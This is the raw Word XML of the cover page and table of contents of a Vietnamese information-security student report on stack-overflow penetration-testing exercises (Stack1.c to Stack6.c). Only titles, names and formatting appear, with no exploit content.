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B52A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRPr="00BE0542" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
        <w:ind w:firstLine="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE05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EE8AB6" wp14:editId="4C1A2695">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-468630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7292340" cy="9471660"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1772514325" name="Group 1772514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92340" cy="9471660"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8820" cy="14097"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1082593752" name="Group 10825937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35738161" name="Picture 1835738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2339548" name="Picture 822339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86832081" name="Picture 208683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47440694" name="Group 747440694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61790885" name="Picture 20617908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666643" name="Picture 306666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5852325" name="Group 475852325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02776347" name="Picture 1002776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19349" name="Picture 25319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96361742" name="Group 1296361742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00379650" name="Picture 1300379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340754" name="Picture 553407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42756275" name="Picture 1442756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6861005" name="Picture 142686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654701" name="Picture 1717654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57E8A" id="Group 1772514325" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:-36.9pt;width:574.2pt;height:745.8pt;z-index:-251657216;mso-position-horizontal:center;mso-position-horizontal-relative:page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Dvuyf9EC4AABAuAAAVAAAAZHJzL21lZGlh&#10;L2ltYWdlNC5qcGVn/9j/4AAQSkZJRgABAQEA3ADcAAD/2wBDAAIBAQEBAQIBAQECAgICAgQDAgIC&#10;AgUEBAMEBgUGBgYFBgYGBwkIBgcJBwYGCAsICQoKCgoKBggLDAsKDAkKCgr/2wBDAQICAgICAgUD&#10;AwUKBwYHCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgr/&#10;wAARCAEsAS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">
                <v:group id="Group 1082593752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35738161" o:spid="_x0000_s1028" type="#_x0000_t75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">
                    <v:imagedata r:id="rId12" o:title=""/>
                  </v:shape>
                  <v:shape id="Picture 822339548" o:spid="_x0000_s1029" type="#_x0000_t75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">
                    <v:imagedata r:id="rId13" o:title=""/>
                  </v:shape>
                </v:group>
                <v:shape id="Picture 2086832081" o:spid="_x0000_s1030" type="#_x0000_t75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">
                  <v:imagedata r:id="rId14" o:title=""/>
                </v:shape>
                <v:group id="Group 747440694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">
                  <v:shape id="Picture 2061790885" o:spid="_x0000_s1032" type="#_x0000_t75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">
                    <v:imagedata r:id="rId15" o:title=""/>
                  </v:shape>
                  <v:shape id="Picture 306666643" o:spid="_x0000_s1033" type="#_x0000_t75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">
                    <v:imagedata r:id="rId13" o:title=""/>
                  </v:shape>
                </v:group>
                <v:group id="Group 475852325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">
                  <v:shape id="Picture 1002776347" o:spid="_x0000_s1035" type="#_x0000_t75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">
                    <v:imagedata r:id="rId15" o:title=""/>
                  </v:shape>
                  <v:shape id="Picture 25319349" o:spid="_x0000_s1036" type="#_x0000_t75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">
                    <v:imagedata r:id="rId13" o:title=""/>
                  </v:shape>
                </v:group>
                <v:group id="Group 1296361742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">
                  <v:shape id="Picture 1300379650" o:spid="_x0000_s1038" type="#_x0000_t75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">
                    <v:imagedata r:id="rId12" o:title=""/>
                  </v:shape>
                  <v:shape id="Picture 55340754" o:spid="_x0000_s1039" type="#_x0000_t75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">
                    <v:imagedata r:id="rId13" o:title=""/>
                  </v:shape>
                </v:group>
                <v:shape id="Picture 1442756275" o:spid="_x0000_s1040" type="#_x0000_t75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">
                  <v:imagedata r:id="rId16" o:title="" gain="126031f" blacklevel="1966f"/>
                </v:shape>
                <v:shape id="Picture 1426861005" o:spid="_x0000_s1041" type="#_x0000_t75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" filled="t" fillcolor="#3cc">
                  <v:imagedata r:id="rId16" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1717654701" o:spid="_x0000_s1042" type="#_x0000_t75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">
                  <v:imagedata r:id="rId14" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139C6C6" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRPr="00BE0542" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>KHO</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>A AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B94D0" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRPr="00BE0542" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE05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B216E" wp14:editId="1F1E1DC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1853565" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8270443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73A2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4.8pt" to="145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5D8C535" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61682FB5" wp14:editId="74FB0E3D">
            <wp:extent cx="3512820" cy="1965960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1146377263" name="Picture 1" descr="A red logo with a yellow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7263" name="Picture 1" descr="A red logo with a yellow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4D55" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312D8FDE" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF51742" w14:textId="0D47C182" w:rsidR="00EF2828" w:rsidRPr="00201B54" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00201B54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhóm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>03: Kiểm thử xâm nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A1020" w14:textId="074F89A2" w:rsidR="00EF2828" w:rsidRPr="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">BÀI TẬP </w:t>
      </w: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lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Stack Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019C4CC" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1296F5A4" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C864E3B" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6C833C" w14:textId="301D3BA7" w:rsidR="00EF2828" w:rsidRPr="00BE0542" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Giảng viên:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đinh Trường Duy</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0542">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112AFE26" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF331D6" w14:textId="293FD715" w:rsidR="00EF2828" w:rsidRPr="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sinh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Viên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167FA3BC" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRPr="006625FC" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006625FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Bùi Quang Anh</w:t>
      </w:r>
      <w:r w:rsidRPr="006625FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">         - B20DCAT003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103E98E" w14:textId="6520A36A" w:rsidR="00EF2828" w:rsidRPr="006625FC" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E23B005" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRPr="00BE0542" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA39D5B" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D6D294" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268E19A1" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F05A9D" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295506F8" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA45382" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273B510B" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRPr="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D88EE4" w14:textId="4D8A3026" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006625FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hà Nội, tháng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006625FC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63E73A" w14:textId="77777777" w:rsidR="00727950" w:rsidRDefault="00727950">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC5A7FE" w14:textId="77777777" w:rsidR="00727950" w:rsidRDefault="00727950">
      <w:pPr>
        <w:rPr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1982651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CB9FB" w14:textId="10795432" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C032105" w14:textId="5FFED4BF" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
          <w:pPr>
            <w:pStyle w:val="TO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91213" w:history="1">
            <w:r w:rsidRPr="00C4737F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bài 1: Stack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A292" w14:textId="0FDC7859" w:rsidR="00EF2828" w:rsidRDefault="00000000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64791214" w:history="1">
            <w:r w:rsidR="00EF2828" w:rsidRPr="00C4737F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bài 2: Stack2.c</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc164791214 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EF2828"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4</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12678825" w14:textId="1574E829" w:rsidR="00EF2828" w:rsidRDefault="00000000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64791215" w:history="1">
            <w:r w:rsidR="00EF2828" w:rsidRPr="00C4737F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bài 3: Stack3.c</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc164791215 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EF2828"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6</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28DEA366" w14:textId="00FE012F" w:rsidR="00EF2828" w:rsidRDefault="00000000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64791216" w:history="1">
            <w:r w:rsidR="00EF2828" w:rsidRPr="00C4737F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bài 4: Stack4.c</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc164791216 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EF2828"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8</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="002F3D20" w14:textId="6A691C04" w:rsidR="00EF2828" w:rsidRDefault="00000000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64791217" w:history="1">
            <w:r w:rsidR="00EF2828" w:rsidRPr="00C4737F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bài 5: Stack5.c</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc164791217 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EF2828"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12</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F48A987" w14:textId="7DECE094" w:rsidR="00EF2828" w:rsidRDefault="00000000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64791218" w:history="1">
            <w:r w:rsidR="00EF2828" w:rsidRPr="00C4737F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bài 6: Stack6.c</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc164791218 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EF2828"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16</w:t>
            </w:r>
            <w:r w:rsidR="00EF2828">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1737ACA0" w14:textId="6ECED975" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6A4B453D" w14:textId="77777777" w:rsidR="00727950" w:rsidRDefault="00727950">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4BDEDE" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5049E45F" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC46ABD" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51205541" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410CB41A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3394A3F1" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DC81C9" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000F27A0" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53335F07" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
